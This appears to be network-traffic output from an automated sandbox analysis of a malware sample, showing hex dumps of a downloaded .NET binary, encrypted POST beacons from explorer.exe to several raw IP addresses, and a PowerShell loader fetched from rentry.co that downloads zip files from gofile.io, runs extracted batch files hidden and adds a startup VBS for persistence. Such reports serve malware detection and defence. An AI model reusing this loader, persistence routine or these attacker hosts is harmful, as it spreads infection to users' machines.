                                                                              Data Ascii: 000)01090A0Q0Y0q0 00010y0&00,x=k4Fa00KS9[0agy0r\@1y0!00=#:&&>60aIQ
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: 6e 63 65 6c 42 75 74 74 6f 6e 00 73 65 74 5f 53 68 6f 77 4e 65 77 46 6f 6c 64 65 72 42 75 74 74 6f 6e 00 73 65 74 5f 41 63 63 65 70 74 42 75 74 74 6f 6e 00 52 75 6e 00 43 6f 6d 70 61 72 65 54 6f 00 47 65 74 50 61 74 68 54 6f 00 55 6e 64 6f 00 5f 50 53 49 6e 66 6f 00 48 6f 73 74 43 6f 6d 6d 61 6e 64 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 55 49 43 75 6c 74 75 72 65 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 43 75 6c 74 75 72 65 49 6e 66 6f 00 70 55 69 49 6e 66 6f 00 52 65 67 69 6f 6e 49 6e 66 6f 00 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 00 47 65 74 56 65 72 73 69 6f 6e 49 6e 66 6f 00 76 65 72 73 69 6f 6e 49 6e 66 6f 00 67 65 74 5f 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 48 6f 73 74 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 68 52 65 73 49 6e 66 6f
                                                                              Data Ascii: ncelButtonset_ShowNewFolderButtonset_AcceptButtonRunCompareToGetPathToUndo_PSInfoHostCommandInfooriginalUICultureInfooriginalCultureInfopUiInfoRegionInfoFileVersionInfoGetVersionInfoversionInfoget_InvocationInfoHostInvocationInfohResInfo
                                                                              2024-07-27 12:53:21 UTC16320INData Raw: 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 80 8d 01 54 55 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 65 63 75 72 69 74 79 50 65 72 6d 69 73 73 69 6f 6e 46 6c 61 67 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 46 6c 61 67 73 00 04 00 00 80 95 2e 01 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 41 74
                                                                              Data Ascii: ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TUSystem.Security.Permissions.SecurityPermissionFlag, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089Flags.System.Security.Permissions.PermissionSetAt
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea fe 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea
                                                                              Data Ascii: ffffffffffffffffffffffffffffffffffffffff
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 07 f0 01 ff 00 00 ff 83 80 01 c1 ff 00 00 ff 90 00 00 09 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff c0 00 00 03 ff 00 00 ff f0 00 00 0f ff 00 00 ff ff 00 00 ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 28 00 00 00 50 00 00 00 01 00 20 00 00 00 00 00 40 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: ((P @
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: 59 b1 e8 ff 59 b1 e8 be 00 00 00 00 00 00 00 00 00 00 00 00 59 b1 e8 05 59 b1 e8 5f 59 b1 e8 ab 59 b1 e8 dc 59 b1 e8 f9 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 fa 59 b1 e8 de 59 b1 e8 af 59 b1 e8 65 59 b1 e8 08 00 00 00 00 00 00 00 00 e0 07 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 82 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 73 00 65 00 74 00 75 00 70 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: YYYY_YYYYYYYYYYeYsetups
                                                                              2024-07-27 12:53:21 UTC2744INData Raw: 45 89 9d d1 33 da 32 02 23 db 12 08 eb 9d 50 9c fa 75 86 2a bd c5 4d 00 ca 8b cb cd bb 22 e7 09 51 e4 8a 78 8b f8 bc fb 1f 87 c1 82 4d 7a dc b9 71 8b 5d 58 9e ee 40 fe 98 69 9b 56 fe 33 68 1e 9e fa a8 d7 ed ab f2 25 4b 1e b1 11 80 51 8c 50 71 1d 2a b6 7f 38 54 43 9a 01 6b 09 36 3a c6 76 8f 4c 0e 7f ba bb 02 a8 c2 b7 ab 7f f9 f6 e6 5a 3a c0 59 85 99 1a 3f d1 2e 39 6d a9 d1 4f 06 92 0a a9 d8 63 54 8c 5a 1a 0c d5 85 a1 3f c4 72 81 83 89 38 0d f1 59 90 16 09 f4 15 ae 3f dd d3 9b ea 5a 58 10 f0 5c 8e c5 83 76 a5 1a c6 e8 12 b5 8f 5a 5b f0 30 09 a9 78 95 23 78 a2 d9 63 6e 89 3c bb 7d 65 67 1e 4d 55 ae 23 2b a3 7a ba 9b e4 83 26 7a a2 c9 9b 98 85 ab f4 32 e1 83 c6 c8 f8 a8 97 0e 70 d6 4f 4e 78 ee 04 ae 64 b6 14 ab e4 d5 e8 ef c3 84 96 47 e4 b5 57 25 a7 92 d6 38
                                                                              Data Ascii: E32#Pu*M"QxMzq]X@iV3h%KQPq*8TCk6:vLZ:Y?.9mOcTZ?r8Y?ZX\vZ[0x#xcn<}egMU#+z&z2pONxdGW%8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449764167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:22 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:22 UTC1122OUTData Raw: 5a 50 68 64 6f 56 30 38 54 2f 69 70 53 36 42 4f 59 4f 48 54 36 35 6f 48 76 4d 59 39 5a 4a 30 72 6f 31 42 4d 54 38 34 63 6b 38 6d 67 2f 5a 4c 33 52 54 77 4e 52 7a 4b 36 36 34 66 49 6e 58 49 4b 69 73 71 48 69 6b 34 4f 4b 37 41 51 42 79 52 37 53 72 35 4a 64 6d 35 35 33 6c 4d 45 38 55 62 43 54 5a 2f 7a 4c 7a 59 4e 4c 36 51 46 33 65 74 69 6a 4a 47 58 55 78 7a 46 6b 51 79 65 6f 68 6d 69 48 76 6d 6c 45 35 4b 77 43 53 54 55 6c 32 53 50 73 64 42 78 79 33 6a 6d 59 73 75 72 78 42 6d 55 54 49 6e 31 64 7a 74 77 65 36 65 44 44 6d 79 6e 46 61 72 4a 79 78 49 2b 46 58 59 31 37 73 64 54 6b 33 5a 52 34 78 74 59 70 46 6e 78 76 4a 65 69 78 5a 41 46 50 39 56 5a 4c 65 35 42 69 4f 4f 78 50 78 5a 6d 74 6e 70 4f 6b 6b 72 46 5a 33 36 4a 50 49 65 4c 65 73 6f 6d 67 44 44 73 54 4c 57
                                                                              Data Ascii: ZPhdoV08T/ipS6BOYOHT65oHvMY9ZJ0ro1BMT84ck8mg/ZL3RTwNRzK664fInXIKisqHik4OK7AQByR7Sr5Jdm553lME8UbCTZ/zLzYNL6QF3etijJGXUxzFkQyeohmiHvmlE5KwCSTUl2SPsdBxy3jmYsurxBmUTIn1dztwe6eDDmynFarJyxI+FXY17sdTk3ZR4xtYpFnxvJeixZAFP9VZLe5BiOOxPxZmtnpOkkrFZ36JPIeLesomgDDsTLW
                                                                              2024-07-27 12:53:23 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:23 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:23 UTC685INData Raw: 66 79 74 6d 4c 49 57 68 61 55 75 62 37 4e 4e 32 59 65 42 33 68 66 30 64 59 52 73 57 2b 67 58 35 45 4b 44 44 50 45 35 39 66 78 44 71 5a 55 44 61 42 34 61 72 4c 34 48 77 4a 39 64 58 61 69 61 4d 38 2f 44 6e 37 75 4b 2b 6e 77 51 37 48 56 53 32 53 33 4a 72 4f 4f 45 2f 6c 70 6d 32 75 56 42 4b 50 6f 51 59 64 77 79 72 55 7a 47 2f 48 78 44 68 6f 64 37 59 2f 51 5a 51 70 61 2f 76 31 50 4e 52 6a 47 6f 53 50 68 4b 6b 6e 31 53 69 4c 78 4a 4e 39 42 78 64 75 41 6f 79 70 2b 53 48 69 50 63 38 61 52 4b 58 33 32 2b 51 51 7a 44 49 79 6d 41 57 49 45 37 2b 37 38 4a 39 52 6f 35 37 2b 37 62 66 79 36 7a 65 51 4b 73 57 42 73 34 35 4b 38 38 4a 34 72 79 56 41 56 41 75 4e 65 44 57 41 59 73 79 79 41 73 4b 7a 64 39 63 76 46 32 74 63 30 2f 34 6f 56 78 71 6c 79 4a 6f 39 66 46 33 49 53 30
                                                                              Data Ascii: fytmLIWhaUub7NN2YeB3hf0dYRsW+gX5EKDDPE59fxDqZUDaB4arL4HwJ9dXaiaM8/Dn7uK+nwQ7HVS2S3JrOOE/lpm2uVBKPoQYdwyrUzG/HxDhod7Y/QZQpa/v1PNRjGoSPhKkn1SiLxJN9BxduAoyp+SHiPc8aRKX32+QQzDIymAWIE7+78J9Ro57+7bfy6zeQKsWBs45K88J4ryVAVAuNeDWAYsyyAsKzd9cvF2tc0/4oVxqlyJo9fF3IS0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449769107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:24 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:24 UTC1122OUTData Raw: 68 44 4a 61 6c 75 7a 4b 33 39 32 50 69 63 61 76 66 35 7a 55 6e 2b 2b 58 73 55 39 66 46 2f 56 6f 71 53 71 4b 36 45 44 7a 2f 63 64 75 54 75 71 4b 58 43 47 78 54 56 48 6a 58 39 6d 50 52 4b 67 59 50 5a 51 41 42 39 6c 74 37 6a 7a 53 77 62 7a 38 6d 37 74 32 32 7a 43 79 36 4b 44 48 73 33 33 42 34 6d 54 4a 4d 33 35 47 31 61 57 6a 39 61 51 44 53 65 77 39 59 7a 38 61 41 44 42 2f 6a 4a 44 66 38 57 6a 4e 46 38 4b 6b 6d 61 73 4e 6c 50 6f 36 62 7a 76 75 78 73 66 59 49 37 47 68 33 39 6d 36 38 70 66 6e 53 55 70 43 56 42 4f 7a 44 6a 64 55 68 64 70 4b 4e 38 46 45 32 41 62 45 62 68 6e 4e 6f 6c 62 6d 51 45 56 66 62 6e 6b 5a 45 78 6c 58 42 6d 34 55 79 6d 6b 66 42 46 45 38 33 2f 6b 78 59 50 34 56 79 33 68 49 53 56 48 47 6a 57 46 39 4e 6f 77 51 51 45 75 76 67 58 5a 6f 36 55 43
                                                                              Data Ascii: hDJaluzK392Picavf5zUn++XsU9fF/VoqSqK6EDz/cduTuqKXCGxTVHjX9mPRKgYPZQAB9lt7jzSwbz8m7t22zCy6KDHs33B4mTJM35G1aWj9aQDSew9Yz8aADB/jJDf8WjNF8KkmasNlPo6bzvuxsfYI7Gh39m68pfnSUpCVBOzDjdUhdpKN8FE2AbEbhnNolbmQEVfbnkZExlXBm4UymkfBFE83/kxYP4Vy3hISVHGjWF9NowQQEuvgXZo6UC
                                                                              2024-07-27 12:53:25 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:25 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:25 UTC685INData Raw: 62 61 52 6b 49 62 78 45 4c 30 68 7a 49 76 48 73 37 68 30 70 38 6f 41 73 43 64 7a 33 34 57 33 6e 52 50 47 70 34 31 73 65 41 76 79 46 6c 61 32 5a 53 71 64 57 44 2b 68 45 79 75 6f 61 62 53 67 7a 30 48 59 48 76 42 48 30 4f 76 34 48 4a 4b 39 55 75 50 77 71 71 36 54 76 79 4e 7a 43 67 35 69 32 55 52 30 7a 4c 53 37 57 37 48 57 65 7a 4a 52 2b 70 68 48 50 6d 55 57 68 34 54 2b 5a 72 48 37 48 6e 71 37 44 4d 37 6d 6a 51 4f 7a 74 38 63 6d 61 65 36 73 44 63 5a 6d 79 30 79 4b 30 37 66 77 45 34 53 75 47 72 45 4e 34 67 47 66 50 6f 47 43 44 41 37 58 76 72 53 68 32 49 31 67 65 43 39 4c 71 2f 51 49 47 36 43 65 73 46 34 6a 73 53 51 6f 46 69 75 53 55 56 6c 57 4a 5a 71 4d 6d 6f 6b 5a 31 39 2f 73 43 62 70 73 76 45 52 48 63 68 6b 6e 5a 45 65 35 76 79 35 4a 74 66 6f 44 41 78 5a 65
                                                                              Data Ascii: baRkIbxEL0hzIvHs7h0p8oAsCdz34W3nRPGp41seAvyFla2ZSqdWD+hEyuoabSgz0HYHvBH0Ov4HJK9UuPwqq6TvyNzCg5i2UR0zLS7W7HWezJR+phHPmUWh4T+ZrH7Hnq7DM7mjQOzt8cmae6sDcZmy0yK07fwE4SuGrEN4gGfPoGCDA7XvrSh2I1geC9Lq/QIG6CesF4jsSQoFiuSUVlWJZqMmokZ19/sCbpsvERHchknZEe5vy5JtfoDAxZe


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449772107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:26 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:26 UTC1122OUTData Raw: 4e 79 6d 6a 67 6e 54 4a 71 48 51 63 50 44 73 6b 63 6c 58 62 6c 65 35 64 64 77 53 39 66 54 74 5a 34 6e 6d 7a 4e 56 32 4d 2b 43 52 49 59 59 6e 45 6b 45 64 78 48 42 6d 4e 47 6f 77 47 64 66 6d 2b 65 30 2b 73 63 6d 2f 6c 34 61 57 34 59 48 43 5a 77 42 31 48 33 75 4f 46 76 64 58 2f 44 32 51 2b 7a 6f 51 64 63 64 49 67 47 6f 38 59 70 49 71 63 50 4d 46 35 41 4e 76 49 44 6a 2f 32 6d 70 59 66 47 52 6c 30 72 31 30 4e 69 49 43 52 71 6c 6c 71 66 30 4d 72 38 61 6f 4e 38 41 49 67 72 59 49 2b 34 71 53 58 66 50 4d 4a 74 65 4c 4d 4e 38 44 42 2f 4d 44 39 74 79 32 44 4f 4e 6f 54 7a 59 6a 36 43 7a 6e 6a 56 52 61 2b 73 5a 70 67 72 6b 2f 76 43 77 33 41 34 4f 30 69 4c 55 6b 4e 6a 49 39 73 56 73 71 50 2f 45 52 72 67 4c 57 31 66 58 63 2f 6f 47 5a 63 43 77 65 46 58 4b 58 6f 4a 75 42
                                                                              Data Ascii: NymjgnTJqHQcPDskclXble5ddwS9fTtZ4nmzNV2M+CRIYYnEkEdxHBmNGowGdfm+e0+scm/l4aW4YHCZwB1H3uOFvdX/D2Q+zoQdcdIgGo8YpIqcPMF5ANvIDj/2mpYfGRl0r10NiICRqllqf0Mr8aoN8AIgrYI+4qSXfPMJteLMN8DB/MD9ty2DONoTzYj6CznjVRa+sZpgrk/vCw3A4O0iLUkNjI9sVsqP/ERrgLW1fXc/oGZcCweFXKXoJuB
                                                                              2024-07-27 12:53:28 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:27 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:28 UTC685INData Raw: 41 42 37 62 70 73 44 79 34 77 55 73 7a 56 32 38 38 59 6c 4c 6e 53 34 6e 74 47 4d 33 67 34 33 50 6f 6f 41 2b 6c 33 4a 61 30 70 42 46 56 6f 30 58 77 56 33 79 52 6d 4e 47 66 48 38 54 73 58 6b 32 4a 4b 61 64 2f 4d 36 36 4e 56 6b 55 61 39 45 48 63 33 52 44 7a 37 47 2f 6e 74 42 6b 33 6d 53 79 2b 55 4c 4e 36 51 6b 35 73 71 73 42 56 56 73 62 71 77 45 79 4a 49 43 64 39 54 50 35 72 69 50 53 2b 6c 33 4f 32 69 38 75 52 74 39 48 64 50 63 37 38 46 4d 43 79 30 72 5a 56 79 6a 45 53 62 42 4a 35 6d 2f 78 76 42 36 33 4e 59 58 31 50 4d 4c 62 57 62 64 70 61 2b 76 6c 43 34 6e 56 72 48 7a 63 38 6a 78 53 56 56 64 76 37 4b 77 39 53 30 35 7a 64 34 32 67 71 6c 2f 75 37 75 2f 37 56 42 4d 58 70 73 41 79 41 62 4e 30 2b 6b 73 5a 66 7a 6a 39 49 52 77 61 51 65 64 41 63 36 71 37 4d 72 34
                                                                              Data Ascii: AB7bpsDy4wUszV288YlLnS4ntGM3g43PooA+l3Ja0pBFVo0XwV3yRmNGfH8TsXk2JKad/M66NVkUa9EHc3RDz7G/ntBk3mSy+ULN6Qk5sqsBVVsbqwEyJICd9TP5riPS+l3O2i8uRt9HdPc78FMCy0rZVyjESbBJ5m/xvB63NYX1PMLbWbdpa+vlC4nVrHzc8jxSVVdv7Kw9S05zd42gql/u7u/7VBMXpsAyAbN0+ksZfzj9IRwaQedAc6q7Mr4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449774104.26.3.164434888C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:27 UTC167OUTGET /microgods/raw HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                              Host: rentry.co
                                                                              Connection: Keep-Alive
                                                                              2024-07-27 12:53:27 UTC694INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:27 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 2509
                                                                              Connection: close
                                                                              vary: Origin
                                                                              x-xss-protection: 1; mode=block
                                                                              x-content-type-options: nosniff
                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                              Cache-Control: Vary
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMQM20skFtJVA%2Fxwt0IH6idHWnt1WiB3UceP7dl9QDmthw87Ze6oZqvMacACIl0OLzFFbGPhWoZlbhtD7XrPr7xfE0gMNYCWoH2CcClx19vGpuxUBozNIZrbfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5c0ac2a72b9-EWR
                                                                              2024-07-27 12:53:27 UTC675INData Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f
                                                                              Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
                                                                              2024-07-27 12:53:27 UTC1369INData Raw: 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a
                                                                              Data Ascii: ry ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }}
                                                                              2024-07-27 12:53:27 UTC465INData Raw: 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 74 68 20 24 62 61
                                                                              Data Ascii: ir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File | Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePath $ba


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449776167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:28 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:28 UTC1122OUTData Raw: 65 31 4f 2f 5a 51 47 52 4b 61 77 4d 41 7a 42 71 77 6a 78 47 38 5a 71 6c 7a 73 31 41 67 49 51 50 43 75 32 54 61 68 45 55 37 4e 31 51 6e 6c 47 6e 56 5a 52 59 42 59 6b 6b 2f 31 77 37 66 61 4e 50 48 6f 31 38 72 6a 75 30 52 4a 65 76 64 48 42 74 61 66 35 67 78 38 46 31 66 78 4e 52 77 51 70 4b 57 4f 68 35 43 2b 63 48 32 6a 55 35 55 4e 71 65 75 45 69 37 49 7a 37 65 65 6e 32 65 59 52 5a 5a 6f 6c 6a 6a 7a 52 56 45 65 64 42 78 73 64 52 57 69 63 4a 30 4d 31 38 72 71 62 70 4a 52 48 44 7a 6c 43 69 6d 31 57 49 4a 62 42 52 53 36 4e 2f 72 6e 7a 37 78 41 2f 52 6d 69 6b 4a 4c 64 41 62 54 2f 48 56 39 34 41 4e 49 52 59 72 71 67 6d 4d 6b 2f 4c 4a 49 4a 74 37 6d 41 66 6a 76 41 78 55 34 55 53 2f 64 4c 38 35 57 4b 30 59 49 33 6a 6c 67 30 33 55 36 4a 79 73 38 4c 56 56 32 70 73 41
                                                                              Data Ascii: e1O/ZQGRKawMAzBqwjxG8Zqlzs1AgIQPCu2TahEU7N1QnlGnVZRYBYkk/1w7faNPHo18rju0RJevdHBtaf5gx8F1fxNRwQpKWOh5C+cH2jU5UNqeuEi7Iz7een2eYRZZoljjzRVEedBxsdRWicJ0M18rqbpJRHDzlCim1WIJbBRS6N/rnz7xA/RmikJLdAbT/HV94ANIRYrqgmMk/LJIJt7mAfjvAxU4US/dL85WK0YI3jlg03U6Jys8LVV2psA
                                                                              2024-07-27 12:53:29 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:29 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
